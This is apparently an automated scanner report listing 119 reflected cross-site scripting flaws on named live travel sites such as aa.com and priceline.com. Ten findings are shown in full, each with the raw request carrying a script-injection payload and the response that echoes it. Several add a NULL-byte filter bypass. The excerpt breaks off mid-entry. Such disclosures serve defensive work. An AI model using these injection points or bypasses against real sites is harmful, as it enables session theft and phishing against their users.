XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 11132011-01

Report generated by XSS.CX at Sun Nov 13 09:08:19 CST 2011.

Loading



1. Cross-site scripting (reflected)

1.1. http://joinus.aa.com/ [name of an arbitrarily supplied request parameter]

1.2. http://tickets.priceline.com/affiliates/default.asp [name of an arbitrarily supplied request parameter]

1.3. http://tickets.priceline.com/affiliates/default.asp [plf parameter]

1.4. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [name of an arbitrarily supplied request parameter]

1.5. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [plf parameter]

1.6. http://tickets.priceline.com/mediakit/about.asp [name of an arbitrarily supplied request parameter]

1.7. http://tickets.priceline.com/mediakit/about.asp [plf parameter]

1.8. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [name of an arbitrarily supplied request parameter]

1.9. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [plf parameter]

1.10. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [name of an arbitrarily supplied request parameter]

1.11. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [plf parameter]

1.12. http://tickets.priceline.com/travel/airlines/lang/en-us/air_leavebehind.asp [lbp parameter]

1.13. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [name of an arbitrarily supplied request parameter]

1.14. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [path parameter]

1.15. http://tickets.priceline.com/travel/airlines/lang/en-us/details_ret_bk.asp [plf parameter]

1.16. http://travel.travelocity.com/trips/UpdateXFactorSelect.do [jsessionid parameter]

1.17. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [batchId parameter]

1.18. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-id parameter]

1.19. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [c0-scriptName parameter]

1.20. https://www.aa.com/dwr/call/plaincall/HomePageUtils.reportImpression.dwr [callCount parameter]

1.21. https://www.aa.com/dwr/interface/CancelVPNRAjaxUtil.js [REST URL parameter 3]

1.22. https://www.aa.com/dwr/interface/CountryLanguageSelectAjaxUtils.js [REST URL parameter 3]

1.23. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]

1.24. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]

1.25. https://www.aa.com/dwr/interface/HomePageUtils.js [REST URL parameter 3]

1.26. https://www.aa.com/dwr/interface/SmartSuggestAjaxUtils.js [REST URL parameter 3]

1.27. https://www.aa.com/homePage.do [locale parameter]

1.28. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [anchorEvent parameter]

1.29. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [from parameter]

1.30. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [name of an arbitrarily supplied request parameter]

1.31. https://www.aa.com/i18n/amrcorp/newsroom/main.jsp [REST URL parameter 1]

1.32. https://www.aa.com/i18n/productsGifts/giftCard.jsp [anchorEvent parameter]

1.33. https://www.aa.com/i18n/productsGifts/giftCard.jsp [from parameter]

1.34. https://www.aa.com/i18n/productsGifts/giftCard.jsp [name of an arbitrarily supplied request parameter]

1.35. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [from parameter]

1.36. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [name of an arbitrarily supplied request parameter]

1.37. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [from parameter]

1.38. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [name of an arbitrarily supplied request parameter]

1.39. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [from parameter]

1.40. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [name of an arbitrarily supplied request parameter]

1.41. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [from parameter]

1.42. https://www.aa.com/i18n/reservations/paymentOptions/main.jsp [name of an arbitrarily supplied request parameter]

1.43. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [from parameter]

1.44. https://www.aa.com/i18n/reservations/paymentOptions/payPal.jsp [name of an arbitrarily supplied request parameter]

1.45. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [anchorEvent parameter]

1.46. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [from parameter]

1.47. https://www.aa.com/i18n/travelInformation/duringFlight/cabinComfort.jsp [name of an arbitrarily supplied request parameter]

1.48. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [anchorEvent parameter]

1.49. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [from parameter]

1.50. https://www.aa.com/i18n/travelInformation/duringFlight/dining/dining.jsp [name of an arbitrarily supplied request parameter]

1.51. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [anchorEvent parameter]

1.52. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [from parameter]

1.53. https://www.aa.com/i18n/travelInformation/duringFlight/entertainment/main.jsp [name of an arbitrarily supplied request parameter]

1.54. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [anchorEvent parameter]

1.55. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [from parameter]

1.56. https://www.aa.com/i18n/travelInformation/duringFlight/onboardTechnology.jsp [name of an arbitrarily supplied request parameter]

1.57. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [anchorEvent parameter]

1.58. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [from parameter]

1.59. https://www.aa.com/i18n/travelInformation/specialAssistance/childrenTraveling.jsp [name of an arbitrarily supplied request parameter]

1.60. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [anchorEvent parameter]

1.61. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [from parameter]

1.62. https://www.aa.com/i18n/travelInformation/specialAssistance/healthAndWellbeing.jsp [name of an arbitrarily supplied request parameter]

1.63. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [anchorEvent parameter]

1.64. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [from parameter]

1.65. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWhilePregnant.jsp [name of an arbitrarily supplied request parameter]

1.66. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [anchorEvent parameter]

1.67. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [from parameter]

1.68. https://www.aa.com/i18n/travelInformation/specialAssistance/travelingWithPets.jsp [name of an arbitrarily supplied request parameter]

1.69. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [anchorEvent parameter]

1.70. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [from parameter]

1.71. https://www.aa.com/i18n/travelInformation/tickets/main.jsp [name of an arbitrarily supplied request parameter]

1.72. https://www.aa.com/i18n/urls/rss.jsp [from parameter]

1.73. https://www.aa.com/i18n/urls/rss.jsp [name of an arbitrarily supplied request parameter]

1.74. https://www.aa.com/i18n/urls/westernunion.jsp [from parameter]

1.75. https://www.aa.com/i18n/urls/westernunion.jsp [name of an arbitrarily supplied request parameter]

1.76. https://www.aa.com/i18n/utility/evoucher.jsp [from parameter]

1.77. https://www.aa.com/i18n/utility/evoucher.jsp [name of an arbitrarily supplied request parameter]

1.78. https://www.aa.com/i18n/utility/siteMap/siteMap.jsp [name of an arbitrarily supplied request parameter]

1.79. https://www.aa.com/login/loginAccess.do [bookingPathStateId parameter]

1.80. https://www.aa.com/login/loginAccess.do [marketId parameter]

1.81. https://www.aa.com/login/loginAccess.do [name of an arbitrarily supplied request parameter]

1.82. https://www.aa.com/login/loginAccess.do [previousPage parameter]

1.83. https://www.aa.com/login/loginAccess.do [uri parameter]

1.84. https://www.aa.com/reservation/awardFlightSearchAccess.do [anchorEvent parameter]

1.85. https://www.aa.com/reservation/awardFlightSearchAccess.do [from parameter]

1.86. https://www.aa.com/reservation/awardFlightSearchAccess.do [name of an arbitrarily supplied request parameter]

1.87. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [anchorEvent parameter]

1.88. https://www.aa.com/reservation/flightCheckInViewReservationsAccess.do [name of an arbitrarily supplied request parameter]

1.89. https://www.aa.com/reservation/multiCitySearchAccess.do [anchorEvent parameter]

1.90. https://www.aa.com/reservation/multiCitySearchAccess.do [from parameter]

1.91. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]

1.92. https://www.aa.com/reservation/multiCitySearchAccess.do [name of an arbitrarily supplied request parameter]

1.93. https://www.aa.com/reservation/oneWaySearchAccess.do [anchorEvent parameter]

1.94. https://www.aa.com/reservation/oneWaySearchAccess.do [from parameter]

1.95. https://www.aa.com/reservation/oneWaySearchAccess.do [name of an arbitrarily supplied request parameter]

1.96. https://www.aa.com/reservation/reservationsHomeAccess.do [from parameter]

1.97. https://www.aa.com/reservation/reservationsHomeAccess.do [name of an arbitrarily supplied request parameter]

1.98. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorEvent parameter]

1.99. https://www.aa.com/reservation/roundTripSearchAccess.do [anchorLocation parameter]

1.100. https://www.aa.com/reservation/roundTripSearchAccess.do [from parameter]

1.101. https://www.aa.com/reservation/roundTripSearchAccess.do [name of an arbitrarily supplied request parameter]

1.102. https://www.aa.com/reservation/roundTripSearchAccess.do [promoCode parameter]

1.103. https://www.aa.com/reservation/roundTripSearchAccess.do [url parameter]

1.104. https://www.aa.com/reservation/searchFlightsSubmit.do [name of an arbitrarily supplied request parameter]

1.105. https://www.aa.com/seatmap/viewSeatsAccess.do [from parameter]

1.106. https://www.aa.com/seatmap/viewSeatsAccess.do [name of an arbitrarily supplied request parameter]

1.107. https://www.aa.com/utilities/BookCar.jsp [src parameter]

1.108. http://www.igougo.com/ [name of an arbitrarily supplied request parameter]

1.109. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 1]

1.110. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 3]

1.111. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 4]

1.112. http://www.lastminute.de/de_DE/lmn2/travel/kombi/fh/new.do [REST URL parameter 5]

1.113. http://www.oneworld.com/ [name of an arbitrarily supplied request parameter]

1.114. http://www.pronto.com/ [name of an arbitrarily supplied request parameter]

1.115. http://www.reisefeber.no/no/package_tours [REST URL parameter 1]

1.116. http://www.reisefeber.no/no/package_tours [REST URL parameter 2]

1.117. http://www.travel-ticker.com/category.jsp [categoryName parameter]

1.118. http://travel.travelocity.com/trips/SelectHotel.do [tyrg1st cookie]

1.119. https://www.aa.com/homePage.do [JSESSIONID cookie]



1. Cross-site scripting (reflected)
There are 119 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://joinus.aa.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://joinus.aa.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55156"><script>alert(1)</script>595b0cfe751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?55156"><script>alert(1)</script>595b0cfe751=1 HTTP/1.1
Host: joinus.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 13 Nov 2011 13:33:21 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=JFtNpprYzAEkAAAAODBhN2NlNDUtZjEyYi00NjViLTkwYjAtOTA4NDA1YWMwMDFj0; expires=Sun, 22-Jan-2012 00:13:21 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 19713
Connection: Close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head id="Head
...[SNIP]...
<a href="/uso-american-airlines?55156"><script>alert(1)</script>595b0cfe751=1">
...[SNIP]...

1.2. http://tickets.priceline.com/affiliates/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /affiliates/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69805"><script>alert(1)</script>88b9717e2ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /affiliates/default.asp?69805"><script>alert(1)</script>88b9717e2ae=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:23 GMT
Server: Microsoft-IIS/6.0
Content-Length: 33297
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:22 GMT
Set-Cookie: PSessKey=701410AC711510AC20111113133622986161309442; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Travel Affiliate Programs from Priceline | Priceline.co
...[SNIP]...
<a href="?69805"><script>alert(1)</script>88b9717e2ae=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F8063B772279B72E8E18A5E7F368CFFBA3D57A979FF05B86AF22B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.3. http://tickets.priceline.com/affiliates/default.asp [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /affiliates/default.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e5606"><script>alert(1)</script>e5e4f217810 was submitted in the plf parameter. This input was echoed as e5606"><script>alert(1)</script>e5e4f217810 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /affiliates/default.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e5606"><script>alert(1)</script>e5e4f217810 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:29 GMT
Server: Microsoft-IIS/6.0
Content-Length: 30487
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:29 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

<title>
Travel Affiliate Programs from Priceline | Priceline.co
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e5606"><script>alert(1)</script>e5e4f217810&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.4. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /customerservice/faq/howitworks/air.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd02"><script>alert(1)</script>39b1db408e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customerservice/faq/howitworks/air.asp?cfd02"><script>alert(1)</script>39b1db408e2=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:16 GMT
Server: Microsoft-IIS/6.0
Content-Length: 28869
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:16 GMT
Set-Cookie: PSessKey=701410AC711510AC2011111313361648ccc1291841; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?cfd02"><script>alert(1)</script>39b1db408e2=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F806B047BC7F76785CC4E24B59AD7FF49AD3891D58C9169BC3D4B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.5. http://tickets.priceline.com/customerservice/faq/howitworks/air.asp [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /customerservice/faq/howitworks/air.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d3957"><script>alert(1)</script>ade352f47a2 was submitted in the plf parameter. This input was echoed as d3957"><script>alert(1)</script>ade352f47a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /customerservice/faq/howitworks/air.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00d3957"><script>alert(1)</script>ade352f47a2 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:24 GMT
Server: Microsoft-IIS/6.0
Content-Length: 25405
Content-Type: text/html
Expires: Sun, 13 Nov 2011 13:36:24 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00d3957"><script>alert(1)</script>ade352f47a2&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.6. http://tickets.priceline.com/mediakit/about.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /mediakit/about.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631f9"><script>alert(1)</script>30158527445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediakit/about.asp?631f9"><script>alert(1)</script>30158527445=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 19427
Content-Type: text/html
Set-Cookie: PSessKey=701410AC711510AC20111113133622876151300138; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?631f9"><script>alert(1)</script>30158527445=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F8067542839926CEA7DEB9BDCECC2748D0F347C4168E09359AE0B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.7. http://tickets.priceline.com/mediakit/about.asp [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /mediakit/about.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f41d3"><script>alert(1)</script>e2c0178b28d was submitted in the plf parameter. This input was echoed as f41d3"><script>alert(1)</script>e2c0178b28d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /mediakit/about.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00f41d3"><script>alert(1)</script>e2c0178b28d HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:30 GMT
Server: Microsoft-IIS/6.0
Content-Length: 16642
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00f41d3"><script>alert(1)</script>e2c0178b28d&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.8. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/adware_spyware_policy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f3f"><script>alert(1)</script>cbecf3117c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacypolicy/adware_spyware_policy.asp?27f3f"><script>alert(1)</script>cbecf3117c1=1 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 30154
Content-Type: text/html
Set-Cookie: PSessKey=701410AC711510AC201111131336189960a1303066; domain=.priceline.com; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?27f3f"><script>alert(1)</script>cbecf3117c1=1&dbg=DF7C589E3F2C2C48CF0512DFBD78F3B201215939E1B6F8066C11E7D83D308189A0189F90ED297A5DA9FB406BF14B3769B88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E539
...[SNIP]...

1.9. http://tickets.priceline.com/privacypolicy/adware_spyware_policy.asp [plf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/adware_spyware_policy.asp

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e8976"><script>alert(1)</script>3a9159f2321 was submitted in the plf parameter. This input was echoed as e8976"><script>alert(1)</script>3a9159f2321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /privacypolicy/adware_spyware_policy.asp?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e8976"><script>alert(1)</script>3a9159f2321 HTTP/1.1
Host: tickets.priceline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 13:36:27 GMT
Server: Microsoft-IIS/6.0
Content-Length: 26689
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html lang="en">
<head>

<title>
Priceline.com - Travel, airline tickets, cheap flights, hotels, hotel rooms, rental cars, car r
...[SNIP]...
<a href="?session_key=6F1410AC701410AC20111113132157549a20293325&plf=pcln%00e8976"><script>alert(1)</script>3a9159f2321&dbg=B3DA697EF19D0D07DF7C589E3F2C2C4801215939E1B6F806F86FBC004F076F7597B8D6C1CA19DEB1411FF4D73CC4E70CB88E626BB6A0981766D680E6799D48E2F5EFD332C9851B34BE09689168DDE73555C45870D0EFCC2E7EA78B760EF006E53924
...[SNIP]...

1.10. http://tickets.priceline.com/privacypolicy/privacypolicy.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tickets.priceline.com
Path:   /privacypolicy/privacypolicy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f4a"><script>alert(1)</script>618595210a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

